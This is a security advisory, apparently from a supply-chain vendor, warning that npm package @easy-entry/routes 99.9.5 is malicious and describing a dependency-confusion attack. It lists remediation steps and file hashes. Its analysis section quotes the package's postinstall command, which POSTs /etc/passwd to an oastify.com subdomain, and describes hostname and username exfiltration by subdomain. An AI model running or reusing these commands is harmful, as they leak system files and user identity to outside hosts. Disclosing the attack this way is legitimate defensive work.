Which versions of @easy-entry/routes are malicious?

The following npm versions of @easy-entry/routes are flagged malicious: 99.9.5. Treat any of these as compromised.

How do I remediate @easy-entry/routes if I installed it?

Remove @easy-entry/routes from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Is @easy-entry/routes part of a known attack campaign?

Yes — @easy-entry/routes is associated with the IN-MAL-2026-005022, IN-MAL-2026-005021 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

Can O3 Security detect @easy-entry/routes in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking @easy-entry/routes and packages like it before any post-install script runs.

Malicious package

@easy-entry/routesnpm

Malicious code in @easy-entry/routes (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-5410

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall @easy-entry/routes

What this malware does

On npm install, the package's postinstall hook in package.json runs curl --data '@/etc/passwd' $(hostname).200hj786m7x4kfz1lkr4kmshu80zoqcf.oastify.com, POSTing the contents of /etc/passwd to an attacker-controlled Burp Collaborator subdomain prefixed with the installer's hostname. The same hook executes scripts/scream3gg.js, which hex-encodes os.hostname(), os.homedir(), and os.userInfo().username and issues an HTTP fetch to http://<hex>.nmd25sur8sjp60lm75dp67e2gtmkaayz.oastify.com, tunneling installer identity out via subdomain. The package has no legitimate functionality — it ships only the exfil payload. The scoped name @easy-entry/routes combined with an absurd 99.9.5 version is a textbook dependency-confusion shape designed to win resolution against an internal-only package of the same name.

Malicious versions

1 flagged

99.9.5

Indicators of compromise (SHA-256)

1519bae164552d25b7e45c1361d040210e637c9f8a304aa807aae7c56ce008a3

29029f04aa1f06f388096de7cfdda12b92ce4c8dc68c2fe3e6091b318a521516

Frequently asked questions

No. @easy-entry/routes on npm has been identified as a malicious package (version 99.9.5 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-005022IN-MAL-2026-005021

References

npmjs.com

Credits

Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection